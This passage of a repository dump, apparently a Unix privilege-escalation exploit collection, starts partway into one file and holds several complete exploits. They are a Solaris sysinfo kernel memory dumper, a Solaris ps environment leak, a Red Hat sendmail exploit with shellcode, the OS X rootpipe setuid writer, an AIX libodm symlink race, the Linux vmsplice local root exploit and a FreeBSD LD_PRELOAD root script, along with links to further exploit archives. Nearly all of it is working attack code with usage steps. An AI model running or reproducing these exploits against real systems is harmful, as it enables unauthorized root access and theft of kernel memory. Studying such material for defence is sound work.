systeminfo.c for Sun Solaris allows local users to read kernel memory via 8 | * a 0 variable count argument to the sysinfo system call, which causes a -1 9 | * argument to be used by the copyout function. NOTE: this issue has been 10 | * referred to as an integer overflow, but it is probably more like a 11 | * signedness error or integer underflow (CVE-2006-3824). 12 | * 13 | * http://en.wikipedia.org/wiki/Pitagora_Suicchi 14 | * 15 | * Greets to prdelka, who also exploited this vulnerability. 16 | * 17 | * I should also definitely investigate the old sysinfo(2) vulnerability 18 | * described in CVE-2003-1062, affecting Solaris/SPARC 2.6 through 9 and 19 | * Solaris/x86 2.6 through 8... It may come in handy sooner or later;) 20 | * 21 | * Usage: 22 | * $ gcc raptor_sysinfo.c -o raptor_sysinfo -Wall 23 | * $ ./raptor_sysinfo kerndump 666666 24 | * [...] 25 | * $ ls -l kerndump 26 | * -rwx------ 1 raptor other 666666 Aug 22 14:41 kerndump 27 | * 28 | * Vulnerable platforms (SPARC): 29 | * Solaris 10 without patch 118833-09 [tested] 30 | * 31 | * Vulnerable platforms (x86): 32 | * Solaris 10 without patch 118855-06 [untested] 33 | */ 34 | 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | 43 | #define INFO1 "raptor_sysinfo.c - Solaris sysinfo(2) kernel memory leak" 44 | #define INFO2 "Copyright (c) 2006 Marco Ivaldi " 45 | 46 | #define BUFSIZE 536870911 47 | 48 | int errno; 49 | 50 | int main(int argc, char **argv) 51 | { 52 | int fd; 53 | size_t out, bufsize = BUFSIZE; 54 | char *buf; 55 | 56 | /* print exploit information */ 57 | fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); 58 | 59 | /* read command line */ 60 | if (argc < 2) { 61 | fprintf(stderr, "usage: %s outfile [outsize]\n\n", argv[0]); 62 | exit(1); 63 | } 64 | if (argc > 2) 65 | if ((bufsize = atoi(argv[2])) == 0) { 66 | fprintf(stderr, "Error (atoi): invalid outsize\n"); 67 | exit(1); 68 | } 69 | 70 | /* print some output */ 71 | fprintf(stderr, "Using outfile\t: %s\n", argv[1]); 72 | fprintf(stderr, "Using outsize\t: %u\n\n", bufsize); 73 | 74 | /* prepare the output buffer */ 75 | if ((buf = (char *)malloc(bufsize)) == NULL) { 76 | perror("Error (malloc)"); 77 | fprintf(stderr, "Hint: Try again with a smaller output size\n"); 78 | exit(1); 79 | } 80 | memset(buf, 0, bufsize); 81 | 82 | /* Pitagora Suicchi! */ 83 | sysinfo(SI_SYSNAME, buf, 0); 84 | 85 | /* save output to outfile */ 86 | if ((fd = open(argv[1], O_RDWR | O_CREAT | O_TRUNC, 0700)) < 0) { 87 | perror("Error (open)"); 88 | free(buf); 89 | exit(1); 90 | } 91 | out = write(fd, buf, bufsize); 92 | fprintf(stderr, "Pitagora Suicchi! %u bytes written to %s\n", out, argv[1]); 93 | fprintf(stderr, "Hint: Try also with a bigger output size\n"); 94 | 95 | close(fd); 96 | free(buf); 97 | 98 | exit(0); 99 | } 100 | -------------------------------------------------------------------------------- /raptor_ucbps.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 4 | # $Id: raptor_ucbps,v 1.1 2006/07/26 12:15:42 raptor Exp $ 5 | # 6 | # raptor_ucbps - information leak with Solaris /usr/ucb/ps 7 | # Copyright (c) 2006 Marco Ivaldi 8 | # 9 | # A security vulnerability in the "/usr/ucb/ps" (see ps(1B)) command may allow 10 | # unprivileged local users the ability to see environment variables and their 11 | # values for processes which belong to other users (Sun Alert ID: 102215). 12 | # 13 | # Absolutely nothing fancy, but it may turn out to be useful;) 14 | # 15 | # Usage: 16 | # $ chmod +x raptor_ucbps 17 | # $ ./raptor_ucbps 18 | # [...] 19 | # 20 | # Vulnerable platforms (SPARC): 21 | # Solaris 8 without patch 109023-05 [tested] 22 | # Solaris 9 without patch 120240-01 [tested] 23 | # 24 | # Vulnerable platforms (x86): 25 | # Solaris 8 without patch 109024-05 [untested] 26 | # Solaris 9 without patch 120239-01 [untested] 27 | # 28 | 29 | echo "raptor_ucbps - information leak with Solaris /usr/ucb/ps" 30 | echo "Copyright (c) 2006 Marco Ivaldi " 31 | echo 32 | 33 | /usr/ucb/ps -auxgeww 34 | -------------------------------------------------------------------------------- /rh71sm8.c: -------------------------------------------------------------------------------- 1 | /* 2 | * rh71sm8.c (RED HAT 7.1 SENDMAIL EXPLOIT) 3 | * 4 | * thanks, grange, for the original. 5 | * 6 | * Use objdump to find GOT: 7 | * $ objdump -R /usr/sbin/sendmail |grep setuid 8 | * 0809e07c R_386_JUMP_SLOT setuid 9 | * ^^^^^^^^^ GOT 10 | * 11 | * Probably you should play with offs to make exploit work. 12 | * 13 | * To get root type ./rh71sm8 1000 and then press Ctrl+C. 14 | * 15 | * 16 | */ 17 | 18 | #include 19 | #include 20 | 21 | #define OFFSET 1000 22 | #define VECT 0x080ca160 23 | #define GOT 0x080ad8d0 24 | 25 | #define NOPNUM 1024 26 | 27 | int offs = 0; 28 | 29 | char shellcode[] = 30 | "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" 31 | "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31" 32 | "\xc0\x88\x43\x07\x89\x5b\x08\x89" 33 | "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0" 34 | "\x0b\xcd\x80\xe8\xe6\xff\xff\xff" "/bin/sh"; 35 | 36 | unsigned int 37 | get_esp () 38 | { 39 | __asm__ ("movl %esp,%eax"); 40 | } 41 | 42 | int 43 | main (int argc, char *argv[]) 44 | { 45 | char *egg, s[256], tmp[256], *av[3], *ev[2]; 46 | unsigned int got = GOT, vect = VECT, ret, first, last, i; 47 | 48 | egg = (char *) malloc (strlen (shellcode) + NOPNUM + 5); 49 | if (egg == NULL) 50 | { 51 | perror ("malloc()"); 52 | exit (-1); 53 | } 54 | sprintf (egg, "EGG="); 55 | memset (egg + 4, 0x90, NOPNUM); 56 | sprintf (egg + 4 + NOPNUM, "%s", shellcode); 57 | 58 | offs = atoi (argv[1]); 59 | 60 | ret = get_esp () + offs; 61 | 62 | sprintf (s, "-d"); 63 | first = -vect - (0xffffffff - got + 1); 64 | last = first; 65 | while (ret) 66 | { 67 | i = ret & 0xff; 68 | sprintf (tmp, "%u-%u.%u-", first, last, i); 69 | strcat (s, tmp); 70 | last = ++first; 71 | ret = ret >> 8; 72 | } 73 | s[strlen (s) - 1] = '\0'; 74 | 75 | av[0] = "/usr/sbin/sendmail"; 76 | av[1] = s; 77 | av[2] = NULL; 78 | ev[0] = egg; 79 | ev[1] = NULL; 80 | execve (*av, av, ev); 81 | } 82 | 83 | -------------------------------------------------------------------------------- /rootpipe.py: -------------------------------------------------------------------------------- 1 | ######################################################## 2 | # 3 | # PoC exploit code for rootpipe (CVE-2015-1130) 4 | # 5 | # Created by Emil Kvarnhammar, TrueSec 6 | # 7 | # Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2 8 | # 9 | ######################################################## 10 | import os 11 | import sys 12 | import platform 13 | import re 14 | import ctypes 15 | import objc 16 | import sys 17 | from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions 18 | from Foundation import NSAutoreleasePool 19 | 20 | def load_lib(append_path): 21 | return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path); 22 | 23 | def use_old_api(): 24 | return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0]) 25 | 26 | 27 | args = sys.argv 28 | 29 | if len(args) != 3: 30 | print "usage: exploit.py source_binary dest_binary_as_root" 31 | sys.exit(-1) 32 | 33 | source_binary = args[1] 34 | dest_binary = os.path.realpath(args[2]) 35 | 36 | if not os.path.exists(source_binary): 37 | raise Exception("file does not exist!") 38 | 39 | pool = NSAutoreleasePool.alloc().init() 40 | 41 | attr = NSMutableDictionary.alloc().init() 42 | attr.setValue_forKey_(04777, NSFilePosixPermissions) 43 | data = NSData.alloc().initWithContentsOfFile_(source_binary) 44 | 45 | print "will write file", dest_binary 46 | 47 | if use_old_api(): 48 | adm_lib = load_lib("/Admin.framework/Admin") 49 | Authenticator = objc.lookUpClass("Authenticator") 50 | ToolLiaison = objc.lookUpClass("ToolLiaison") 51 | SFAuthorization = objc.lookUpClass("SFAuthorization") 52 | 53 | authent = Authenticator.sharedAuthenticator() 54 | authref = SFAuthorization.authorization() 55 | 56 | # authref with value nil is not accepted on OS X <= 10.8 57 | authent.authenticateUsingAuthorizationSync_(authref) 58 | st = ToolLiaison.sharedToolLiaison() 59 | tool = st.tool() 60 | tool.createFileWithContents_path_attributes_(data, dest_binary, attr) 61 | else: 62 | adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration") 63 | WriteConfigClient = objc.lookUpClass("WriteConfigClient") 64 | client = WriteConfigClient.sharedClient() 65 | client.authenticateUsingAuthorizationSync_(None) 66 | tool = client.remoteProxy() 67 | 68 | tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0) 69 | 70 | 71 | print "Done!" 72 | 73 | del pool -------------------------------------------------------------------------------- /tmb-vs-ibm-aix-libodm.c: -------------------------------------------------------------------------------- 1 | /* 2 | Redistribution and use in source and binary forms, with or without 3 | modification, are permitted provided that the following conditions are met: 4 | 5 | * Redistributions of source code must retain the above copyright notice, this 6 | list of conditions and the following disclaimer. 7 | * Redistributions in binary form must reproduce the above copyright notice, 8 | this list of conditions and the following disclaimer in the documentation 9 | and/or other materials provided with the distribution. 10 | * Neither the name of the Nth Dimension nor the names of its contributors may 11 | be used to endorse or promote products derived from this software without 12 | specific prior written permission. 13 | 14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 15 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 16 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 17 | ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE 18 | LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 19 | CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 20 | SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 21 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 22 | CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 23 | ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 24 | POSSIBILITY OF SUCH DAMAGE. 25 | 26 | (c) Tim Brown, 2014 27 | 28 | / 29 | 30 | PoC exploit for IBM AIX libodm ODMERR environment variable privesc. 31 | 32 | This was originally fixed under CVE-2012-2179 however the initial patch 33 | simply turned it from a direct symlink attack to a raceable symlink attack. 34 | 35 | Greetz to Jakub Wartak for beating me to reporting the original bug, I 36 | hope you enjoy this bug fix to the original exploit :) 37 | */ 38 | 39 | #include 40 | #include 41 | #include 42 | 43 | int main(int argc, char **argv) { 44 | int pwnedflag; 45 | printf("PoC exploit for IBM AIX libodm ODMERR environment variable privesc.\r\n"); 46 | printf("(c) Tim Brown, 2014\r\n"); 47 | printf("\r\n"); 48 | printf(" / \r\n"); 49 | printf("Race started...\r\n"); 50 | pwnedflag = 0; 51 | umask(0); 52 | if (fork()) { 53 | setenv("ODMERR", "1", 1); 54 | while (!pwnedflag) { 55 | if (!access("/etc/pwned", F_OK)) { 56 | pwnedflag = 1; 57 | printf("Race won...\r\n"); 58 | unsetenv("ODMERR"); 59 | exit(EXIT_SUCCESS); 60 | } 61 | system("/usr/bin/at"); 62 | } 63 | } else { 64 | while (!pwnedflag) { 65 | symlink("/etc/pwned", "ODMTRACE0"); 66 | if (!access("/etc/pwned", F_OK)) { 67 | pwnedflag = 1; 68 | printf("Race won...\r\n"); 69 | exit(EXIT_SUCCESS); 70 | } 71 | unlink("ODMTRACE0"); 72 | } 73 | } 74 | } -------------------------------------------------------------------------------- /uselib24.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/uselib24.zip -------------------------------------------------------------------------------- /vmsplice.c: -------------------------------------------------------------------------------- 1 | /* 2 | * diane_lane_fucked_hard.c 3 | * 4 | * Linux vmsplice Local Root Exploit 5 | * By qaaz 6 | * 7 | * Linux 2.6.23 - 2.6.24 8 | */ 9 | #define _GNU_SOURCE 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #define TARGET_PATTERN " sys_vm86old" 18 | #define TARGET_SYSCALL 113 19 | 20 | #ifndef __NR_vmsplice 21 | #define __NR_vmsplice 316 22 | #endif 23 | 24 | #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) 25 | #define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4) 26 | 27 | #define TRAMP_CODE (void *) trampoline 28 | #define TRAMP_SIZE ( sizeof(trampoline) - 1 ) 29 | 30 | unsigned char trampoline[] = 31 | "\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */ 32 | "\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */ 33 | "\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */ 34 | "\x75\x02" /* jne +2 */ 35 | "\xff\xd1" /* call *%ecx */ 36 | "\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */ 37 | "\xc3" /* ret */ 38 | ; 39 | 40 | void die(char *msg, int err) 41 | { 42 | printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); 43 | fflush(stdout); 44 | fflush(stderr); 45 | exit(1); 46 | } 47 | 48 | long get_target() 49 | { 50 | FILE *f; 51 | long addr = 0; 52 | char line[128]; 53 | 54 | f = fopen("/proc/kallsyms", "r"); 55 | if (!f) die("/proc/kallsyms", errno); 56 | 57 | while (fgets(line, sizeof(line), f)) { 58 | if (strstr(line, TARGET_PATTERN)) { 59 | addr = strtoul(line, NULL, 16); 60 | break; 61 | } 62 | } 63 | 64 | fclose(f); 65 | return addr; 66 | } 67 | 68 | static inline __attribute__((always_inline)) 69 | void * get_current() 70 | { 71 | unsigned long curr; 72 | __asm__ __volatile__ ( 73 | "movl %%esp, %%eax ;" 74 | "andl %1, %%eax ;" 75 | "movl (%%eax), %0" 76 | : "=r" (curr) 77 | : "i" (~8191) 78 | ); 79 | return (void *) curr; 80 | } 81 | 82 | static uint uid, gid; 83 | 84 | void kernel_code() 85 | { 86 | int i; 87 | uint *p = get_current(); 88 | 89 | for (i = 0; i < 1024-13; i++) { 90 | if (p[0] == uid && p[1] == uid && 91 | p[2] == uid && p[3] == uid && 92 | p[4] == gid && p[5] == gid && 93 | p[6] == gid && p[7] == gid) { 94 | p[0] = p[1] = p[2] = p[3] = 0; 95 | p[4] = p[5] = p[6] = p[7] = 0; 96 | p = (uint *) ((char *)(p + 8) + sizeof(void *)); 97 | p[0] = p[1] = p[2] = ~0; 98 | break; 99 | } 100 | p++; 101 | } 102 | } 103 | 104 | int main(int argc, char *argv[]) 105 | { 106 | int pi[2]; 107 | long addr; 108 | struct iovec iov; 109 | 110 | uid = getuid(); 111 | gid = getgid(); 112 | setresuid(uid, uid, uid); 113 | setresgid(gid, gid, gid); 114 | 115 | printf("-----------------------------------\n"); 116 | printf(" Linux vmsplice Local Root Exploit\n"); 117 | printf(" By qaaz\n"); 118 | printf("-----------------------------------\n"); 119 | 120 | if (!uid || !gid) 121 | die("!@#$", 0); 122 | 123 | addr = get_target(); 124 | printf("[+] addr: 0x%lx\n", addr); 125 | 126 | if (pipe(pi) < 0) 127 | die("pipe", errno); 128 | 129 | iov.iov_base = (void *) addr; 130 | iov.iov_len = TRAMP_SIZE; 131 | 132 | write(pi[1], TRAMP_CODE, TRAMP_SIZE); 133 | _vmsplice(pi[0], &iov, 1, 0); 134 | 135 | gimmeroot(); 136 | 137 | if (getuid() != 0) 138 | die("wtf", 0); 139 | 140 | printf("[+] root\n"); 141 | putenv("HISTFILE=/dev/null"); 142 | execl("/bin/bash", "bash", "-i", NULL); 143 | die("/bin/bash", errno); 144 | return 0; 145 | } 146 | 147 | -------------------------------------------------------------------------------- /w00t.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo ** FreeBSD local r00t zeroday 3 | echo by Kingcope 4 | echo November 2009 5 | cat > env.c << _EOF 6 | #include 7 | 8 | main() { 9 | extern char **environ; 10 | environ = (char**)malloc(8096); 11 | 12 | environ[0] = (char*)malloc(1024); 13 | environ[1] = (char*)malloc(1024); 14 | strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0"); 15 | 16 | execl("/sbin/ping", "ping", 0); 17 | } 18 | _EOF 19 | gcc env.c -o env 20 | cat > program.c << _EOF 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | void _init() { 27 | extern char **environ; 28 | environ=NULL; 29 | system("echo ALEX-ALEX;/bin/sh"); 30 | } 31 | _EOF 32 | gcc -o program.o -c program.c -fPIC 33 | gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles 34 | cp w00t.so.1.0 /tmp/w00t.so.1.0 35 | ./env 36 | -------------------------------------------------------------------------------- /x.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/x.zip -------------------------------------------------------------------------------- /x2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/x2.zip -------------------------------------------------------------------------------- /xpl-2.6.31-2010.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/xpl-2.6.31-2010.zip --------------------------------------------------------------------------------